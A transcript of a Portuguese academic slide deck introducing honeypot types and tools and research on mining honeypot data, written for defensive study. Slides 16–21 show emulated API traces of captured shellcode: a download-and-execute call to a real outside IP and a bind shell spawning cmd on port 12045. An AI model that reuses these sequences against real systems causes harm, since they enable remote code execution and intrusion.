honeypots: o que são, para que servem e como extrair informações

Post on 10-Jul-2015

395 Views

Category:

Education

2 Downloads

Preview:

Click to see full reader

TRANSCRIPT

UNIVERSIDADE PRESBITERIANA MACKENZIEPrograma de Pós Graduação em Engenharia Elétrica

Laboratório de Computação Natural - LCoN

Honeypots: o que são, para que servem e como extrair informações

Pedro H. Matheusphmatheus@msn.com

UNIVERSIDADE PRESBITERIANA MACKENZIEPrograma de Pós Graduação em Engenharia Elétrica

Laboratório de Computação Natural - LCoN

• Agenda

• O que são Honeypots

• Para que servem

• Que informações podem ser extraídas ?

3Setembro / 2013phmatheus@msn.com

Honeypot

4Setembro / 2013phmatheus@msn.com

• Honeypots são sistemas computacionais cujo objetivo é ter falhas de segurança para serem atacadas e exploradas

O que são Honeypots

5Setembro / 2013phmatheus@msn.com

• Baixa Interatividade

• Média Interatividade

• Alta Interatividade

Honeypot

6Setembro / 2013phmatheus@msn.com

• Honeyd– É um pequeno programa que cria hosts virtuais na

rede, os hosts podem ser configurados para executarserviços arbitrarios, a suas caracteristicas podem seradaptadas para simularem certos sistemasoperacionais.

• SpamTrap– É um servidor de e-mail criado não para comunicação

de e-mails mas, para ser explorado por spammerspara enviar e-mails, esse servidor não encaminha o e-mail enviado para o destinatário, apenas armazena o e-mail para analise posterior.

Baixa Interatividade

7Setembro / 2013phmatheus@msn.com

• DionaeaÉ uma evolução do Nepentes com suporte a IPV6e um novo meio de se ampliar a base deconhecimento que anteriormente era escrita emc++ agora é escrita em python possibilitando queuma gama maior de programadores criem eexpandam a base de conhecimento conformesuas necessidades.

Média Interatividade

• NepenthesNepenthes emula as vulnerabilidades para a coleta deinformações sobre potenciais ataques é utilizado uma base deconhecimento sobre as falhas para interagir comos atacantes, com o objetivo de obter o artefato malicioso.

8Setembro / 2013phmatheus@msn.com

• Kippo

– Honeypot que simula o serviço de ssh, coletando informações de ataques de brute-force, e posteriormente os comandos enviados pelo atacante.

https://code.google.com/p/kippo/

Média Interatividade

9Setembro / 2013phmatheus@msn.com

• Qebek– Modificação do QEMU para monitorar todas as

chamadas de sistema do Windows, permitindoanalisar, depurar e monitorar a execução de ataques ede artefatos maliciosos.

• Sebek– É um modulo do kernel instalado no Windows com o

proposito de coletar informações sobre os artefatosmaliciosos e os ataques contra os sistemas, elepermite a coleta de informações desde as teclaspressionadas até informações criptografadas.

Alta Interatividade

10Setembro / 2013phmatheus@msn.com

O Fluxo de um ataque

Atacante Honeypot

File System

Base de Dados

Binarios

BitStream

Sniffer

11Setembro / 2013phmatheus@msn.com

• Uso dos dados de rede bruto para extração de informações

• Estatística (Cukier et al. 2006)

• Associação (Ohrui et al. 2010)

• Agrupamento (Ghourabi et al. 2010)

• Correlação com SVM (Song et al. 2011)

• Longest Common Substring (Thakar et al. 2005)

• Redes Neurais MLP e KNN (Grégio et al. 2007)

Extração de informação de Honeypots

12Setembro / 2013phmatheus@msn.com

• O que todos esses trabalhos trazem em comum é que utilizam os dados de rede para gerar as estatísticas, para efetuar o agrupamento, para criar as assinaturas e os padrões dos detectores de intrusão.

Extração de informação de Honeypots

13Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?

Base de Dados

14Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?

Binarios

15Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?

BitStream

16Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?[

{"call": "LoadLibraryA","args" : [

"urlmon"],"return" : "0x7df20000"

},{

"call": "URLDownloadToFile","args" : [

"",

"http:\/\/189.29.132.79:6402\/dkqc","x.",

"0","0"

],"return": "0"

},

{"call": "LoadLibraryA","args" : [

"x."],"return" :

"0x00000000"},{

"call": "ExitThread","args" : [

"0"],"return": "0"

}]

17Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?[

{"call": "GetProcAddress","args" : [

"","CreateProcessA"

],"return" : "0x7c802367"

},{

"call": "GetProcAddress","args" : [

"","ExitThread"

],"return" : "0x7c80c058"

},

{"call": "GetProcAddress","args" : [

"","LoadLibraryA"

],"return" : "0x7c801d77"

},{

"call": "LoadLibraryA","args" : [

"ws2_32"],"return" : "0x71a10000"

},

18Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?{

"call": "GetProcAddress","args" : [

"","WSASocketA"

],"return" : "0x71a18769"

},{

"call": "GetProcAddress","args" : [

"","bind"

],"return" : "0x71a13e00"

},

{"call": "GetProcAddress","args" : [

"","listen"

],"return" : "0x71a188d3"

},{

"call": "GetProcAddress","args" : [

"","accept"

],"return" : "0x71a21028"

},

19Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?{

"call": "GetProcAddress","args" : [

"","closesocket"

],"return" : "0x71a19639"

},{

"call": "WSASocket","args" : [

"2","1","0","0","0","0"

],"return": "66"

},

{"call": "bind","args" : [

"66",{

"sin_family" : "2","sin_port" : "12045","sin_addr" : {

"s_addr" : "0.0.0.0"},"sin_zero" : " "

},"16"

],"return": "0"

},

20Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?{

"call": "listen","args" : [

"66","1"

],"return": "0"

},{

"call": "accept","args" : [

"66",{

},""

],"return": "68"

},

{"call": "CreateProcess","args" : "", "cmd", "", "","1","0", "", "",

{"cb" : "0","lpReserved" : "0","lpDesktop" : "0","lpTitle" : "0","dwX" : "0","dwY" : "0","dwXSize" : "0","dwYSize" : "0","dwXCountChars" : "0","dwYCountChars" : "0","dwFillAttribute" : "0","dwFlags" : "0","wShowWindow" : "0","cbReserved2" : "0","lpReserved2" : "0","hStdInput" : "68","hStdOutput" : "68","hStdError" : "68"

},

21Setembro / 2013phmatheus@msn.com

Que informações podem ser extraídas ?{"hProcess" : "4711","hThread" : "4712","dwProcessId" : "4712","dwThreadId" : "4714"}

],"return": "-1"

},{

"call": "closesocket","args" : [

"68"],"return": "0"

},

{"call": "closesocket","args" : [

"66"],"return": "0"

},{

"call": "ExitThread","args" : [

"0"],"return": "0"

}]

22Setembro / 2013phmatheus@msn.com

Dúvidas

23Setembro / 2013phmatheus@msn.com

• M. Cukier, R. Berthier, S. Panjwani, and S. Tan, “A statistical analysis of attack data to separate attacks,” in Dependable Systems and Networks, 2006. DSN 2006. International Conference on, 2006, pp. 383–392.

• M. Ohrui, H. Kikuchi, and M. Terada, “Mining association rules consisting of download servers from distributed honeypot observation,” in Network-Based Information Systems (NBiS), 2010 13th International Conference on, 2010, pp. 541–545.

• X. Tang, “The generation of attack signatures based on virtual honeypots,” in Parallel and Distributed Computing, Applications and Technologies (PDCAT), 2010 International Conference on, 2010, pp. 435–439.

• A. Ghourabi, T. Abbes, and A. Bouhoula, “Data analyzer based on data mining for honeypot router,” in Computer Systems and Applications (AICCSA), 2010 IEEE/ACS International Conference on, 2010, pp. 1–6.

• J. Song, H. Takakura, Y. Okabe, and Y. Kwon, “Correlation analysis between honeypot data and ids alerts using one-class svm,” Intrusion Detection Systems, In Tech, pp. 173–193, 2011.

• U. Thakar, S. Varma, and A. Ramani, “Honeyanalyzer–analysis and extraction of intrusion detection patterns & signatures using honeypot,” in Proceedings of the Second International Conference on Innovations in Information Technology, 2005.

• A. Grégio, R. Santos, and A. Montes, “Evaluation of data mining techniques for suspicious network activity classification using honeypots data,” in Defense and Security Symposium. International Society for Optics and Photonics, 2007, pp. 657 006–657 006.

• S. Kaiser, “Biclustering: Methods, Software and Application”, Munchen 2011, Disponível em: http://edoc.ub.uni-muenchen.de/13073/1/Kaiser_Sebastian.pdf

Referências

top related